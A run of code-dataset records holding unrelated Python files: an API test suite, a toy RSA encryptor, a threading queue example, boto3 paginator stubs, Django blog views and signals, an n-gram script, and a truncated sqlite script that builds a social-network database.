logging.basicConfig(level=logging.INFO, format='%(asctime)s %(filename)s:%(lineno)s %(levelname)s %(message)s')\n logging.info(json.dumps(vars(args), indent=4))\n\n run(args)\n","sub_path":"HEM/train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"350084328","text":"# returns (a^b) mod n\ndef modExponent(a, b, n):\n result = 1\n a = a % n\n if (a == 0):\n return 0\n while (b > 0):\n if (b & 1 == 1):\n result = (result * a) % n\n b = b >> 1\n a = (a * a) % n\n return result\n\n\n# Identify public key\npublic_key = (46947848749720430529628739081, 37267486263679235062064536973)\nn = public_key[0]\ne = public_key[1]\nprint(\"n: \" + str(n))\nprint(\"e: \" + str(e) + \"\\n\")\n\n# Convert to binary\nm = input(\"Enter plaintext: \")\nm_bin = ''.join(format(ord(i), '08b') for i in m)\nprint(\"binary version: \" + str(m_bin) + \"\\n\")\nm_dec = int(''.join(format(ord(i), '08b') for i in m), 2)\nprint(\"decimal version: \" + str(m_dec) + \"\\n\")\n\n# Encrypt\nc = modExponent(m_dec, e, n)\nprint(\"c: \" + str(c) + \"\\n\")\n","sub_path":"pset5/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"188402887","text":"#!/usr/bin/python3\nimport pymysql\nimport unittest\nimport requests\nimport os\nfrom tests.configAPI import configAPI\nfrom tests.loggingAPI import loggingAPI\nfrom tests.oAuthGenerator import oAuthGenerator\n\n\"\"\" TestAgeCategories class tests all the cases for age categories api\"\"\"\nclass TestSuiteConfigItemsPut(unittest.TestCase):\n\n \"\"\"This method is for getting the initial ID\"\"\"\n def compare_against_DB(self,client_name,counter):\n loggingAPI.logger.info(\"the value that is sent in this function is :\" +client_name)\n if counter == 1:\n sel_query = \"SELECT id FROM RCANALYTICS_CONFIG_SERVICE.CONFIG_ITEMS WHERE CLIENT_ID = \" + \"'\" + client_name + \"';\"\n self.cursor.execute(sel_query)\n sel_results = list(self.cursor.fetchall())\n results = sel_results[0]\n self.res_list = results[0]\n return self.res_list\n else:\n sel_query = \"SELECT * FROM RCANALYTICS_CONFIG_SERVICE.CONFIG_ITEMS WHERE CLIENT_ID = \" + \"'\" + client_name + \"';\"\n print(sel_query)\n self.cursor.execute(sel_query)\n sel_results = list(self.cursor.fetchall())\n results = sel_results[0]\n self.res_list = list(results[1:4])\n print(self.res_list)\n return self.res_list\n\n \"\"\"setUp method initialize the variables and values that are used across the test cases\"\"\"\n def setUp(self):\n self.set_up_list = configAPI.configlist\n self.GET_URL = self.set_up_list[0]\n self.oAuth = oAuthGenerator.Auth(self, self.set_up_list[6], self.set_up_list[7], self.set_up_list[8], self.set_up_list[9])\n self.parms = {'client_id': self.set_up_list[1]}\n self.header = {'Authorization': self.oAuth, 'Content-Type':'application/json'}\n self.db = pymysql.connect(self.set_up_list[2], self.set_up_list[3], self.set_up_list[4],self.set_up_list[5])\n self.cursor = self.db.cursor()\n\n # \"\"\"test_rest_api_putRequest function is used to check the API PUT request with existing ID\"\"\"\n # def test_Step010_putRequest_existing_id(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"test\", \"value\": \"{\\\"test\\\":1251}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n #\n # \"\"\"This case is to check for 409 error on empty client_id\"\"\"\n # def test_Step004_putRequest_empty_clientid(self):\n # params = {\"client_id\": \"\", \"key\": \"\", \"value\": \"\"}\n # self.id_table = self.compare_against_DB(\"test_blr\",1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '409')\n #\n # \"\"\"This case is to check for 409 error on empty key and value\"\"\"\n # def test_Step003_putRequest_empty_key_value(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"\", \"value\": \"\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"],1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '409')\n #\n # \"\"\"This case is to check for 404 error on the invalid config_ID\"\"\"\n # def test_Step002_putRequest_invalid_config_id(self):\n # completeURL = str(self.GET_URL) + \"/0\"\n # params = {\"client_id\":\"test_blr\",\"key\":\"1\",\"value\":\"1\"}\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '404')\n\n \"\"\"This case is to create a new client in table\"\"\"\n def test_Step001_postRequest_new_id(self):\n completeURL = str(self.GET_URL)\n params = {\"client_id\": \"test_blr\", \"key\": \"test\", \"value\": \"test\"}\n self.res = requests.post(completeURL, headers=self.header, json=params)\n self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n self.response = self.res.status_code\n self.assertEqual(str(self.response), '201')\n self.assertEqual(list(self.compare_against_DB(params[\"client_id\"],99)), list(params.values()))\n\n \"\"\"This case is used to check for 204 upon adding net_revenue as key and a json as value\"\"\"\n def test_Step009_putRequest_adding_net_revenue(self):\n params = {\"client_id\": \"test_blr\", \"key\": \"\\\"net_revenue\\\"\", \"value\": \"{\\\"NetRevenue\\\":\\\"[\\\"{\\\"id\\\": 1, \\\"client_id\\\": \\\"test\\\", \\\"org_id\\\": \\\"Org1\\\", \\\"month\\\": 1, \\\"year\\\": 2014, \\\"net_revenue\\\": 1002}\\\"]\\\"}\"}\n self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n print(\"after first test\")\n print(self.id_table)\n completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n self.res = requests.put(completeURL, headers=self.header, json=params)\n self.response = self.res.status_code\n self.assertEqual(str(self.response), '204')\n tokka = self.compare_against_DB(params[\"client_id\"],99)\n print(tokka)\n self.assertEqual(tokka, list(params.values()))\n\n # \"\"\"This case is used to check for 204 upon adding pos_cash_collections as key and a json as value\"\"\"\n # def test_Step005_putRequest_adding_POS_cash_collections(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"pos_cash_collection\", \"value\": \"{\\\"Days\\\": 12}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n #\n # \"\"\"This case is used to check for 204 upon adding pos_days as key and a json as value\"\"\"\n # def test_Step006_putRequest_adding_POS_days(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"pos_days\", \"value\": \"{\\\"Days\\\": 12}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n #\n # \"\"\"This case is used to check for 204 upon adding days_in_dbfb as key and a json as value\"\"\"\n # def test_Step007_putRequest_adding_days_in_dnfb(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"days_in_dnfb\", \"value\": \"{\\\"Range\\\": 1}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n #\n # \"\"\"This case is used to check for 204 upon adding days_in_dnfc as key and a json as value\"\"\"\n # def test_Step008_putRequest_adding_days_in_dnfc(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"days_in_dnfc\", \"value\": \"{\\\"Range\\\": 1}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n\n \"\"\"This is to delete all the test data\"\"\"\n def test_Step012_putRequest_remove_extra_rows(self):\n query_teardown = \"Delete from rcanalytics_config_service.config_items where client_id = 'test_blr'\"\n value = self.cursor.execute(query_teardown)\n self.db.commit()\n self.db.close()\n loggingAPI.logger.info(\"Remove the test data.\")","sub_path":"pythonscripts/tokka/yamlgenerator/Requests/Final_Suite/tests/RCR_VR_HA_Service_ConfigTool_Config_Items_PUT.py","file_name":"RCR_VR_HA_Service_ConfigTool_Config_Items_PUT.py","file_ext":"py","file_size_in_byte":8651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"521832300","text":"import threading\nimport time\nimport queue\nimport random\n\n\n# queue.Queue是多线程安全的\n\nclass Producer(threading.Thread):\n\n def __init__(self,queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n for i in range(10):\n item = random.randint(0,256)\n self.queue.put(item)\n print('Producer notify : item {0} appended to queue by {1}'.format(item,self.name))\n\n\nclass Consumer(threading.Thread):\n def __init__(self,queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n while True:\n item = self.queue.get()\n print('Consumer notify : item {0} poped from queue by {1}'.format(item,self.name))\n self.queue.task_done()\n\nif __name__ == '__main__':\n queue = queue.Queue()\n t1 = Producer(queue)\n t2 = Consumer(queue)\n t3 = Consumer(queue)\n t4 = Consumer(queue)\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n t1.join()\n t2.join()\n t3.join()\n t4.join()\n\n\n\n\n\n\n\n","sub_path":"LearnPython/Python_New/Parallels/ThreadQueueEx.py","file_name":"ThreadQueueEx.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"549804976","text":"\"\"\"\nType annotations for batch service client paginators.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html)\n\nUsage::\n\n ```python\n import boto3\n\n from mypy_boto3_batch import BatchClient\n from mypy_boto3_batch.paginator import (\n DescribeComputeEnvironmentsPaginator,\n DescribeJobDefinitionsPaginator,\n DescribeJobQueuesPaginator,\n ListJobsPaginator,\n ListSchedulingPoliciesPaginator,\n )\n\n client: BatchClient = boto3.client(\"batch\")\n\n describe_compute_environments_paginator: DescribeComputeEnvironmentsPaginator = client.get_paginator(\"describe_compute_environments\")\n describe_job_definitions_paginator: DescribeJobDefinitionsPaginator = client.get_paginator(\"describe_job_definitions\")\n describe_job_queues_paginator: DescribeJobQueuesPaginator = client.get_paginator(\"describe_job_queues\")\n list_jobs_paginator: ListJobsPaginator = client.get_paginator(\"list_jobs\")\n list_scheduling_policies_paginator: ListSchedulingPoliciesPaginator = client.get_paginator(\"list_scheduling_policies\")\n ```\n\"\"\"\nfrom typing import Iterator, List\n\nfrom botocore.paginate import Paginator as Boto3Paginator\n\nfrom .literals import JobStatusType\nfrom .type_defs import (\n DescribeComputeEnvironmentsResponseTypeDef,\n DescribeJobDefinitionsResponseTypeDef,\n DescribeJobQueuesResponseTypeDef,\n KeyValuesPairTypeDef,\n ListJobsResponseTypeDef,\n ListSchedulingPoliciesResponseTypeDef,\n PaginatorConfigTypeDef,\n)\n\n__all__ = (\n \"DescribeComputeEnvironmentsPaginator\",\n \"DescribeJobDefinitionsPaginator\",\n \"DescribeJobQueuesPaginator\",\n \"ListJobsPaginator\",\n \"ListSchedulingPoliciesPaginator\",\n)\n\nclass DescribeComputeEnvironmentsPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeComputeEnvironments)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describecomputeenvironmentspaginator)\n \"\"\"\n\n def paginate(\n self,\n *,\n computeEnvironments: List[str] = None,\n PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[DescribeComputeEnvironmentsResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeComputeEnvironments.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describecomputeenvironmentspaginator)\n \"\"\"\n\nclass DescribeJobDefinitionsPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeJobDefinitions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describejobdefinitionspaginator)\n \"\"\"\n\n def paginate(\n self,\n *,\n jobDefinitions: List[str] = None,\n jobDefinitionName: str = None,\n status: str = None,\n PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[DescribeJobDefinitionsResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeJobDefinitions.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describejobdefinitionspaginator)\n \"\"\"\n\nclass DescribeJobQueuesPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeJobQueues)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describejobqueuespaginator)\n \"\"\"\n\n def paginate(\n self, *, jobQueues: List[str] = None, PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[DescribeJobQueuesResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeJobQueues.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describejobqueuespaginator)\n \"\"\"\n\nclass ListJobsPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.ListJobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#listjobspaginator)\n \"\"\"\n\n def paginate(\n self,\n *,\n jobQueue: str = None,\n arrayJobId: str = None,\n multiNodeJobId: str = None,\n jobStatus: JobStatusType = None,\n filters: List[\"KeyValuesPairTypeDef\"] = None,\n PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[ListJobsResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.ListJobs.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#listjobspaginator)\n \"\"\"\n\nclass ListSchedulingPoliciesPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.ListSchedulingPolicies)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#listschedulingpoliciespaginator)\n \"\"\"\n\n def paginate(\n self, *, PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[ListSchedulingPoliciesResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.ListSchedulingPolicies.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#listschedulingpoliciespaginator)\n \"\"\"\n","sub_path":"typings/mypy_boto3_batch/paginator.pyi","file_name":"paginator.pyi","file_ext":"pyi","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"577794982","text":"from django.shortcuts import render,HttpResponse,redirect\nfrom blog.models import Post,BlogComment\nfrom django.contrib import messages\n# Create your views here.\ndef blogHome(request):\n # return HttpResponse(\"from blogHome\")\n allPost = Post.objects.all()\n context = {'allPost':allPost}\n return render(request,'blog/blogHome.html',context)\n\ndef blogPost(request,slug):\n post = Post.objects.filter(slug=slug).first()\n comments = BlogComment.objects.filter(post=post, parent=None)\n replies = BlogComment.objects.filter(post=post).exclude(parent=None)\n repDict={}\n for reply in replies:\n if reply.parent.sno not in repDict.keys():\n repDict[reply.parent.sno] = [reply]\n else:\n repDict[reply.parent.sno].append(reply) \n context = {'post':post,'comments':comments,'user':request.user,'repDict': repDict}\n return render(request,'blog/blogPost.html',context)\n\ndef PostComment(request):\n if request.method=='POST':\n comment = request.POST.get('comment')\n user = request.user\n postSno = request.POST.get('postSno')\n post = Post.objects.get(sno=postSno)\n parentSno = request.POST.get('parentSno')\n if parentSno==\"\":\n comment = BlogComment(comment=comment,post=post,user=user)\n comment.save()\n messages.success(request,\"your comment has been posted successfully!\") \n else:\n parent = BlogComment.objects.get(sno=parentSno)\n comment = BlogComment(comment=comment,post=post,user=user,parent=parent)\n comment.save()\n messages.success(request,\"your replay has been posted successfully!\")\n return redirect(f\"/blog/{post.slug}\")\n ","sub_path":"django/blog/hackcode/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239958063","text":"__author__ = 'fred'\n\nimport inspect\nimport numpy as np\n\n\nclass Error:\n def cumulate(self, *others):\n if len(others) > 1:\n return Error.cumulate(self.cumulate(others[0]), *others[1:])\n\n def newfunc(*args):\n value = args[0]\n params, errs = args[1::2], args[2::2]\n return self.__func(value, *(params[:self.__n_params] + errs[:self.__n_params])) \\\n + others[0].__func(value, *(params[self.__n_params:] + errs[self.__n_params:]))\n\n return Error(newfunc)\n\n\n def __init__(self, func):\n params = inspect.getargspec(func)\n if len(params[0]) % 2 == 0:\n raise ValueError(\"Falsche anzahl der Parameter\")\n else:\n self.__n_params = len(params[0])/2\n self.__func = lambda *args: func(*args)**2\n print()\n\n def __call__(self, *args):\n if 2*len(args) > self.__n_params:\n print(\"Warnung: zu viele Parameter\")\n return np.sqrt(self.__func(*args))\n\nlinear = Error(lambda v, x, dx: v/x*dx)\nsquare = Error(lambda v, x, dx: 2*v/x*dx)","sub_path":"pythonUtils/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"176405115","text":"import csv\nimport re\nfrom nltk.util import ngrams\nimport os\n\n\nwith open('Paulines-Kinadata_for_python.csv') as file:\n reader = csv.reader(file)\n gay_kina_list = list(reader)\n #print(gay_kina_list)\n\ns = gay_kina_list\ns = str(s)\ns = s.lower()\ns = re.sub(r'[^a-zA-Z0-9\\s]', ' ', s)\ntokens = [token for token in s.split(\" \") if token != \"\"]\noutput = list(ngrams(tokens, 3))\ndata_list = output\nprint(data_list)\n\nwith open('data.csv', 'w', newline='') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerows(data_list)\n\nmyfile.close()\n\n\n\n\n\n\n","sub_path":"N_gram_4_gay_maps.py","file_name":"N_gram_4_gay_maps.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"19149590","text":"from django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom rest_framework.authtoken.models import Token\n\nfrom foodtrack.models import PurchaseItem, UsageCounter, Food\n\n\n@receiver(post_save, sender=PurchaseItem)\ndef purchase_saved(sender, **kwargs):\n if kwargs[\"created\"]:\n purchase: PurchaseItem = kwargs[\"instance\"]\n add_food_usage_count(purchase.food, purchase.owner)\n # save_form_preference(purchase, purchase.owner_id)\n\n\n@receiver(post_save, sender=User)\ndef create_auth_token(sender, instance=None, created=False, **kwargs):\n if created:\n Token.objects.create(user=instance)\n\n\ndef add_food_usage_count(food, user):\n content_type_food = ContentType.objects.get_for_model(Food)\n usage, created = UsageCounter.objects.get_or_create(defaults={\"count\": 1},\n content_type=content_type_food,\n object_id=food.id,\n owner=user)\n if not created:\n usage.count += 1\n usage.save()\n","sub_path":"foodtrack/services/data_events.py","file_name":"data_events.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"55187309","text":"#!/usr/bin/env python3.5\r\n\r\nimport sqlite3\r\nimport time\r\nimport datetime\r\nimport random\r\nimport cgi, cgitb, glob, os, re\r\nfrom base64 import b64encode\r\nfrom datetime import timedelta, datetime\r\n\r\n# Ensures a new database is created when initialising the script\r\nif (os.path.isfile('database.db')):\r\n\tos.remove('database.db') \r\nconn = sqlite3.connect('database.db')\r\nc = conn.cursor()\r\n\r\n# Defines a class for the user\r\nclass User:\r\n\tdef __init__(self, ID, name, email, password, birthday, mates, town, lat, long, program, courses):\r\n\t\tself.ID = ID\r\n\t\tself.name = name\r\n\t\tself.email = email\r\n\t\tself.password = password\r\n\t\tself.birthday = birthday\r\n\t\tself.mates = mates\r\n\t\tself.town = town\r\n\t\tself.lat = lat\r\n\t\tself.long = long\r\n\t\tself.program = program\r\n\t\tself.courses = courses\r\n\t\t\r\n# Defines a class for the post\r\nclass Post:\r\n\tdef __init__(self, ID, author, message, time, lat, long, comments):\r\n\t\tself.ID = ID\r\n\t\tself.author = author\r\n\t\tself.message = message\r\n\t\tself.time = time\r\n\t\tself.lat = lat\r\n\t\tself.long = long\r\n\t\tself.comments = comments\r\n\r\n# Defines a class for the comment\t\r\nclass Comment:\r\n\tdef __init__(self, ID, author, message, time):\r\n\t\tself.ID = ID\r\n\t\tself.author = author\r\n\t\tself.message = message\r\n\t\tself.time = time\r\n\t\t\r\ndef create_users_table():\r\n\tc.execute('CREATE TABLE IF NOT EXISTS users(id REAL PRIMARY KEY, full_name TEXT, email TEXT, password TEXT, birthday TEXT, mates TEXT,' \r\n\t\t\t 'home_suburb TEXT, home_latitude REAL, home_longitude REAL, program TEXT, courses TEXT, dp TEXT, session REAL, profile_text TEXT)')\r\n\tc.execute('ALTER TABLE users ADD COLUMN shipStat TEXT')\r\n\tconn.commit()\r\n\r\n# Creates a blank table 'Mates' where each column will be a different zID and all their mates\r\ndef create_mates_table():\r\n c.execute('CREATE TABLE IF NOT EXISTS mates(temp INTEGER PRIMARY KEY)')\r\n conn.commit() \r\n\r\ndef input_users(user_dir, parameters):\r\n\tusers = sorted(glob.glob(os.path.join(users_dir, \"*\")))\r\n\tfor user in users:\r\n\t\tuser_filename = os.path.join(user, \"user.txt\")\r\n\t\tuserP = extract_user_class(user_filename, user)\r\n\t\tsesh = b64encode(os.urandom(128)).decode('utf-8') # Generates a random session number for security\r\n\t\tif (os.path.isfile(os.path.join(user, \"profile.jpg\"))):\r\n\t\t\tdp = os.path.join(user, \"profile.jpg\")\r\n\t\telse:\r\n\t\t\tdp = None\r\n\t\tc.execute('INSERT OR IGNORE INTO users VALUES(\"{id}\", \"{nm}\", \"{em}\", \"{pw}\", \"{bd}\", \"{ma}\", \"{to}\", \"{la}\", \"{lo}\", \"{pg}\", \"{co}\", \"{dp}\", \"{sesh}\", \"\", \"\")'\\\r\n\t\t\t\t\t.format(id=userP.ID, nm=userP.name, em=userP.email, pw=userP.password, bd=userP.birthday, ma=userP.mates,\r\n\t\t\t\t\tto=userP.town, la=userP.lat, lo=userP.long, pg=userP.program, co=userP.courses, dp=dp, sesh=sesh))\r\n\t\tcreate_posts_table(user, userP.ID)\r\n\t\tupdate_mates_table(userP)\r\n\tconn.commit()\r\n\r\ndef create_posts_table(user, ID):\r\n\tpost_dir = os.path.join(user, \"posts\")\r\n\tposts = sorted(glob.glob(os.path.join(post_dir,\"*\")))\r\n\ttb_name = ID+\"_posts\"\r\n\tc.execute('CREATE TABLE IF NOT EXISTS \"{tb}\"(id REAL PRIMARY KEY, author TEXT, time datetime, message TEXT, lat REAL, long REAL, comments REAL)'.format(tb=tb_name))\r\n\ti = 0\r\n\tfor p in posts:\r\n\t\tpost_filename = os.path.join(p, \"post.txt\")\r\n\t\tpostP = extract_posts(post_filename, p, ID)\r\n\t\tc.execute('INSERT OR IGNORE INTO {tb} VALUES(\"{id}\", \"{au}\", \"{tm}\", \"{msg}\", \"{la}\", \"{lo}\", \"{com}\")'\\\r\n\t\t\t.format(tb=tb_name, id=postP.ID, au=postP.author, tm=postP.time, msg=postP.message, la=postP.lat, lo=postP.long, com=postP.comments))\r\n\t\tc.execute('INSERT OR IGNORE INTO allPosts VALUES(\"{id}\", \"{au}\", \"{tm}\", \"{msg}\", \"{com}\")'\\\r\n\t\t\t.format(tb=tb_name, id=postP.ID, au=postP.author, tm=postP.time, msg=postP.message, com=postP.comments))\r\n\t\tif (postP.comments == 1):\t\r\n\t\t\tcreate_comments_table(p, postP.ID)\r\n\tconn.commit()\r\n\t\r\ndef create_all_posts_table():\r\n\tc.execute('CREATE TABLE IF NOT EXISTS allPosts (id REAL PRIMARY KEY, author TEXT, time datetime, message TEXT, comments REAL)')\r\n\tconn.commit()\r\n\t\r\n\t\r\ndef create_comments_table(post, ID):\r\n\tcomment_dir = os.path.join(post, \"comments\")\r\n\tcomments = sorted(glob.glob(os.path.join(comment_dir,\"*\")))\r\n\ttb_name = ID+\"_comments\"\r\n\tc.execute('CREATE TABLE IF NOT EXISTS \"{tb}\"(id REAL PRIMARY KEY, author TEXT, time datetime, message TEXT)'.format(tb=tb_name))\r\n\ti = 0\r\n\tfor com in comments:\r\n\t\tcomments_filename = os.path.join(com, \"comment.txt\")\r\n\t\tcommentP = extract_comments(comments_filename, com, ID)\r\n\t\tc.execute('INSERT OR IGNORE INTO {tb} VALUES(\"{id}\", \"{au}\", \"{tm}\", \"{msg}\")'\\\r\n\t\t\t.format(tb=tb_name, id=commentP.ID, au=commentP.author, tm=commentP.time, msg=commentP.message))\r\n\r\n\tconn.commit()\r\n\r\n# Inputs mates into the mates table. Structured inversely to other tables (each col is a list of mates for a certain zid)\r\ndef update_mates_table(user):\r\n c.execute('SELECT mates FROM users WHERE id=\"{id}\"'.format(id=user.ID))\r\n data = c.fetchall()\r\n mates = []\r\n mates = data[0][0].split(', ')\r\n mates[0] = re.sub(r'\\[','',mates[0])\r\n mates[-1] = re.sub(r'\\]','',mates[-1])\r\n c.execute('ALTER TABLE mates ADD COLUMN \"{id}\" TEXT'.format(id=user.ID))\r\n for mate in mates:\r\n c.execute('INSERT OR IGNORE INTO mates ({col}) VALUES (\"{mate}\")'.format(col=user.ID, mate=mate))\r\n conn.commit()\r\n\r\n# Extract all the different programs of all users and fills the table.\r\ndef extract_programs():\r\n c.execute('CREATE TABLE IF NOT EXISTS programs (program TEXT PRIMARY KEY)')\r\n c.execute('SELECT program FROM users')\r\n data = c.fetchall()\r\n dataCulled = list(set(data))\r\n programs = []\r\n for i in dataCulled:\r\n programs.append(i[0])\r\n\r\n for program in programs:\r\n c.execute('SELECT id FROM users WHERE program=\"{pr}\"'.format(pr=program))\r\n users = c.fetchall()\r\n c.execute('INSERT OR IGNORE INTO programs(program) VALUES (\"{prog}\")'.format(prog=program)) \r\n # Obtain number of columns in programs table\r\n c.execute('PRAGMA table_info(programs)')\r\n colNum = len(c.fetchall())\r\n \r\n # If num columns is < num people in program, add cols\r\n while (colNum < len(users) + 1):\r\n colName = \"mate_no\"+str(colNum)\r\n c.execute('ALTER TABLE programs ADD COLUMN \"{col}\" TEXT'.format(col=colName))\r\n c.execute('PRAGMA table_info(programs)')\r\n colNum = len(c.fetchall())\r\n \r\n # Now input into row\r\n counter = int(1)\r\n \r\n for user in users:\r\n colName = \"mate_no\"+str(counter)\r\n c.execute('UPDATE programs SET {col} = (\"{zid}\") WHERE program = \"{prog}\"'.format(col=colName, zid=user[0], prog = program))\r\n counter += 1\r\n conn.commit()\r\n \r\n\r\n# Extract all the different courses of all users and fills the table.\r\ndef extract_courses():\r\n c.execute('CREATE TABLE IF NOT EXISTS courses (course TEXT PRIMARY KEY)')\r\n c.execute('SELECT courses FROM users')\r\n data = c.fetchall()\r\n dataCulled = list(set(data))\r\n allCourses = []\r\n for i in dataCulled:\r\n courses = []\r\n courses = i[0].split(', ')\r\n courses[0] = re.sub(r'\\[','',courses[0])\r\n courses[-1] = re.sub(r'\\]','',courses[-1])\r\n allCourses.extend(courses)\r\n \r\n # Make sure all elements are unique\r\n uniCourses = list(set(allCourses))\r\n \r\n for course in uniCourses:\r\n c.execute('SELECT id FROM users WHERE courses LIKE \"{co}\"'.format(co=course))\r\n users = c.fetchall()\r\n c.execute('INSERT OR IGNORE INTO courses (course) VALUES 